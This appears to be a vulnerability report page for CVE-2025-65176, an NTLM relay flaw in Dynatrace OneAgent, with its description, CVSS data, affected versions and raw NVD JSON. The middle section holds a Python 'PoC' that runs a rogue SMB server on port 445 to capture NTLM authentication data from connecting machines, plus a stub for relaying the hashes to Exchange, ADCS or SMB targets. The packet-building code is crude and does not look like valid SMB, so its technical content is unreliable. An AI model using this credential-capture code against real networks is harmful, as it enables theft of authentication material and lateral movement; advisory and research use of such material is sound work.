Security Vulnerability Report
中文
CVE-2025-65176 CVSS 7.5 HIGH

CVE-2025-65176

Published: 2025-12-15 19:16:05
Last Modified: 2026-01-07 20:46:22
Source: [email protected]

Description

An issue was discovered in Dynatrace OneAgent before 1.325.47. When attempting to access a remote network share from a machine where OneAgent is installed and receiving a "STATUS_LOGON_FAILURE" error, the agent will retrieve every user token on the machine and repeatedly attempt to access the network share while impersonating them. The exploitation of this vulnerability can allow an unprivileged attacker with access to the affected system to perform NTLM relay attacks.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:dynatrace:oneagent:*:*:*:*:*:*:*:* - VULNERABLE
Dynatrace OneAgent < 1.325.47

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-65176 NTLM Relay Attack PoC # This PoC demonstrates the NTLM relay vulnerability in Dynatrace OneAgent # Attack Scenario: Setup a rogue SMB server to capture Net-NTLM hashes import socket import threading import hashlib import binascii import struct class RogueSMBServer: def __init__(self, host='0.0.0.0', port=445): self.host = host self.port = port self.captured_hashes = [] def start(self): server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server_socket.bind((self.host, self.port)) server_socket.listen(5) print(f"[*] Rogue SMB Server started on {self.host}:{self.port}") print("[*] Waiting for Dynatrace OneAgent connection...") while True: client_socket, addr = server_socket.accept() print(f"[+] Connection received from: {addr}") threading.Thread(target=self.handle_client, args=(client_socket,)).start() def handle_client(self, client_socket): # SMB Negotiate Protocol Request data = client_socket.recv(1024) if b"SMB" in data: print("[*] SMB Negotiation Request received") # Send SMB Negotiate Protocol Response with STATUS_LOGON_FAILURE # This triggers OneAgent to enumerate user tokens and retry response = self.build_smb_response() client_socket.send(response) print("[+] Sent malicious response to trigger token enumeration") # Capture subsequent authentication attempts try: auth_data = client_socket.recv(4096) if auth_data: print("[+] Captured NTLM authentication data") self.extract_ntlm_hash(auth_data) except: pass client_socket.close() def build_smb_response(self): # Construct SMB response that triggers STATUS_LOGON_FAILURE # This will cause OneAgent to enumerate all user tokens smb_header = b"\x00\x00\x00\x00" error_status = b"\x34\x00\x00\xC0" # STATUS_LOGON_FAILURE return smb_header + error_status def extract_ntlm_hash(self, data): # Extract NTLMSSP authentication from captured data if b"NTLMSSP" in data: ntlm_offset = data.find(b"NTLMSSP") ntlm_data = data[ntlm_offset:ntlm_offset+256] print(f"[+] NTLM Data captured: {binascii.hexlify(ntlm_data[:32])}") self.captured_hashes.append(ntlm_data) print(f"[*] Total hashes captured: {len(self.captured_hashes)}") def relay_attack(target_server, captured_hash): # NTLM Relay: Forward captured hash to target server print(f"[*] Relaying hash to target: {target_server}") # Implementation would relay the NTLM authentication to target # Potential targets: Exchange, ADCS, SMB servers, etc. pass if __name__ == "__main__": server = RogueSMBServer(host='0.0.0.0', port=445) server.start()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65176", "sourceIdentifier": "[email protected]", "published": "2025-12-15T19:16:05.097", "lastModified": "2026-01-07T20:46:22.417", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Dynatrace OneAgent before 1.325.47. When attempting to access a remote network share from a machine where OneAgent is installed and receiving a \"STATUS_LOGON_FAILURE\" error, the agent will retrieve every user token on the machine and repeatedly attempt to access the network share while impersonating them. The exploitation of this vulnerability can allow an unprivileged attacker with access to the affected system to perform NTLM relay attacks."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dynatrace:oneagent:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.325.47", "matchCriteriaId": "595B1C6A-7C56-47BD-9595-0AE82ED8AACD"}]}]}], "references": [{"url": "https://docs.dynatrace.com/docs/shortlink/release-notes-oneagent-sprint-325#oneagent-sprint-325-ga", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://docs.dynatrace.com/docs/whats-new/oneagent/sprint-325#oneagent-sprint-325-ga", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://hackerone.com/reports/3313408", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.